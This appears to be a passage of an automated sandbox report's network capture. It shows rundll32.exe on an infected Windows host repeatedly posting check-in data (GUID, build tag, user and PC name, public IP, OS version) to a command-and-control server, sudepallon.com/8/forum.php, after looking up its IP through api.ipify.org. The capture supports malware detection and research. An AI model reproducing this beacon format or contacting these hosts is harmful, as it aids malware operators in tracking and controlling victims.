                                        Jul 9, 2021 03:07:48.810837984 CEST316OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:48.878561974 CEST317INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:50 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cTCXGARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        200192.168.2.224936577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        201192.168.2.224936677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        202192.168.2.224936777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        203192.168.2.224936877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        204192.168.2.224936977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        205192.168.2.224937077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        206192.168.2.224937177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        207192.168.2.224937277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        208192.168.2.224937377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        209192.168.2.224937477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        21192.168.2.224918677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:49.164876938 CEST317OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:49.235749960 CEST318INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:50 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKHSPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        210192.168.2.224937577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        211192.168.2.224937677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        212192.168.2.224937777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        213192.168.2.224937877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        214192.168.2.224937977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        215192.168.2.224938077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        216192.168.2.224938177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        217192.168.2.224938277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        218192.168.2.224938377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        219192.168.2.224938477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        22192.168.2.224918777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:49.529649973 CEST318OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:49.601042986 CEST319INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:51 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cVVEEARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        220192.168.2.224938577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        221192.168.2.224938677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        222192.168.2.224938777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        223192.168.2.224938877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        224192.168.2.224938977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        225192.168.2.224939077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        226192.168.2.224939177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        227192.168.2.224939277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        228192.168.2.224939377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        229192.168.2.224939477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        23192.168.2.224918877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:49.923046112 CEST320OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:49.993874073 CEST320INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:51 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMJQNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        230192.168.2.224939577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        231192.168.2.224939677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        232192.168.2.224939777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        233192.168.2.224939877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        234192.168.2.224939977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        235192.168.2.224940077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        236192.168.2.224940177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        237192.168.2.224940277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        24192.168.2.224918977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:50.291132927 CEST321OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:50.360042095 CEST321INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:51 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKZAPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        25192.168.2.224919077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:50.648787022 CEST322OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:50.716092110 CEST322INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCVEXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        26192.168.2.224919177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:51.010204077 CEST323OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:51.077481031 CEST323INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZZAAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        27192.168.2.224919277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:51.368006945 CEST324OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:51.438330889 CEST324INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFBYUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        28192.168.2.224919377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:51.726308107 CEST325OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:51.791344881 CEST326INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cAVEZARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        29192.168.2.224919477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:52.087877035 CEST326OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:52.154040098 CEST327INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 42 59 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKBYPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.224916850.19.92.22780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:43.945422888 CEST291OUTGET / HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: api.ipify.org
                                        Cache-Control: no-cache
                                        Jul 9, 2021 03:07:44.052028894 CEST291INHTTP/1.1 200 OK
                                        Server: Cowboy
                                        Connection: keep-alive
                                        Content-Type: text/plain
                                        Vary: Origin
                                        Date: Fri, 09 Jul 2021 01:07:44 GMT
                                        Content-Length: 14
                                        Via: 1.1 vegur
                                        Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                                        Data Ascii: 185.189.150.70


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        30192.168.2.224919577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:52.532351971 CEST327OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:52.603154898 CEST328INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:54 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 48 59 42 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cHYBSARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        31192.168.2.224919677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:53.196866989 CEST328OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:53.262090921 CEST329INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:54 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCVEXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        32192.168.2.224919777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:53.546192884 CEST330OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:53.616055012 CEST330INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJGTQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        33192.168.2.224919877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
